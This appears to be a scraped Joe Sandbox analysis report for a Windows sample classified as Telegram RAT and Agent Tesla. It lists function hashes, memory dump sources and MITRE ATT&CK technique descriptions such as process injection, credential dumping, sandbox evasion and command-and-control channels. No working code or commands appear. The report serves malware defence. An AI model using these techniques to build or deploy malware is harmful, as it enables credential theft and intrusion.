Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6520000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c500fa7b205c44e4453bbc724a997957f0ee9064599bd21249ec4b8fac2583fd
Instruction ID: 4c4d9fc29777758a354c6fc1ddda740d0e7b42904fb05d982102bc5a022dc1ec
Opcode Fuzzy Hash: c500fa7b205c44e4453bbc724a997957f0ee9064599bd21249ec4b8fac2583fd
Instruction Fuzzy Hash: 40A13730F44215DFDB44EB60D848B6DBBA2BB89365F24CA25E5219B2E4EB309C158F50

Uniqueness

Uniqueness Score: -1.00%

Function 06527618 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.530232972.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6520000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b13d31907a1213cfbcd663f9e8a1b213db2ad30fbf8fc8d679653e1c4d71861
Instruction ID: 0946dcf360c1a6e205909883f8ff2b69a2fc0a4f76c77d22e143a7184ff8e736
Opcode Fuzzy Hash: 0b13d31907a1213cfbcd663f9e8a1b213db2ad30fbf8fc8d679653e1c4d71861
Instruction Fuzzy Hash: 0331A231F40225CFDF90EBB988446AE7AE1AF8D244F148469D905EB390EB309D008BB5

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D3EC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.519044203.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a4d000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b8e774b258a9f3963a79ad8bec6fd72a7a8859bbc68bc4bc5c2492722b00202
Instruction ID: 318013ea3c0cc4c285471e7a71d0cb998ea0a1401de7e0f15c5dcbb1e06f7eec
Opcode Fuzzy Hash: 8b8e774b258a9f3963a79ad8bec6fd72a7a8859bbc68bc4bc5c2492722b00202
Instruction Fuzzy Hash: 772137B5504204EFCB01DF10D8C0B26BBA5FBD8324F24C5B9E9094B646C336E856C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D4D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.519044203.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a4d000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59980a5da646fd1097b4c60ce6bec78b5e225acb006b702ae5525e62e6ba1487
Instruction ID: 2fbd955ace768f31f269e7a3b99be432185d0b4e0790214b1cfebbf9b9a37888
Opcode Fuzzy Hash: 59980a5da646fd1097b4c60ce6bec78b5e225acb006b702ae5525e62e6ba1487
Instruction Fuzzy Hash: 1A2137B9504204DFCB01CF14D9C0B26BBB5FBD8328F24C5A9E9094B246C736D856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D3E7 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.519044203.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a4d000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bac84a7fc1bbf5596c0c9cdfbfd886d18a72d0d2145727707f58b7b4c0f4b6
Instruction ID: 72443e4b2b57bf1712e03d4bc8e5e5f87a3bebde7eb371a4509a2d897da92fc4
Opcode Fuzzy Hash: c9bac84a7fc1bbf5596c0c9cdfbfd886d18a72d0d2145727707f58b7b4c0f4b6
Instruction Fuzzy Hash: 1D11B676504280DFCF15CF14D5C4B16BF72FB94324F24C6A9D8494B656C33AE856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00A4D4D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.519044203.0000000000A4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A4D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_a4d000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9bac84a7fc1bbf5596c0c9cdfbfd886d18a72d0d2145727707f58b7b4c0f4b6
Instruction ID: 0e21622aec7abe5a02e5da264f3059d41e9eb53992252f011f3b840d5c3f9080
Opcode Fuzzy Hash: c9bac84a7fc1bbf5596c0c9cdfbfd886d18a72d0d2145727707f58b7b4c0f4b6
Instruction Fuzzy Hash: 36119376504280DFCB15CF14D5C4B16BF71FB98324F2486A9D8454B656C33AD856CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 06525F30 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.530232972.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6520000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: daa61fec7cfce03a556acae691ae1cf222400e377144fd69e21aea16a5c2d153
Instruction ID: 564d6c3c0614c1752ba69ee88b5a4fdcc1aca89fd5e8c801b7c52118f74c952e
Opcode Fuzzy Hash: daa61fec7cfce03a556acae691ae1cf222400e377144fd69e21aea16a5c2d153
Instruction Fuzzy Hash: A0117034F005158F8F90EB78E8489AE7BF1FF8C2157108469E50AD3341EF349D018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 06528FC0 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.530232972.0000000006520000.00000040.00000800.00020000.00000000.sdmp, Offset: 06520000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6520000_rzN2ckYW24.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4c314645aee2e5139f1531bf7de9f7d47edd57521ce4ef7596f1f5fca4e8bfe
Instruction ID: 68cd940116a7fa8548a1e5a7f225320add84d6449c2fcdd8d35d4a670bd32bfc
Opcode Fuzzy Hash: e4c314645aee2e5139f1531bf7de9f7d47edd57521ce4ef7596f1f5fca4e8bfe
Instruction Fuzzy Hash: B1F08971F0012A9F8B80EBB9581469F7AE9EF89254B004476D405E7340FA34591187D1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network protocol analysis, Packet capture, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report rzN2ckYW24.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Telegram RAT

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rzN2ckYW24.exe.log

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
rzN2ckYW24.exe

Function 02B3B898 Relevance: 6.1, APIs: 4, Instructions: 125
threadCOMMON

Function 02B3B8A8 Relevance: 6.1, APIs: 4, Instructions: 120
threadCOMMON

Function 075F9FF0 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Function 02B395B0 Relevance: 1.7, APIs: 1, Instructions: 194
COMMON

Function 02B35368 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 02B33DE4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Function 075F98D8 Relevance: 1.6, APIs: 1, Instructions: 69
injectionCOMMON

Function 02B3BAC8 Relevance: 1.6, APIs: 1, Instructions: 64
COMMON

Function 075F9650 Relevance: 1.6, APIs: 1, Instructions: 63
threadinjectionCOMMON

Function 075F99F8 Relevance: 1.6, APIs: 1, Instructions: 63
COMMON

Function 02B3BAD0 Relevance: 1.6, APIs: 1, Instructions: 62
COMMON

Function 02B39038 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Function 02B39A10 Relevance: 1.6, APIs: 1, Instructions: 54
libraryCOMMON

Function 075F97E8 Relevance: 1.6, APIs: 1, Instructions: 53
memoryCOMMON

Function 075F9570 Relevance: 1.5, APIs: 1, Instructions: 49
threadCOMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre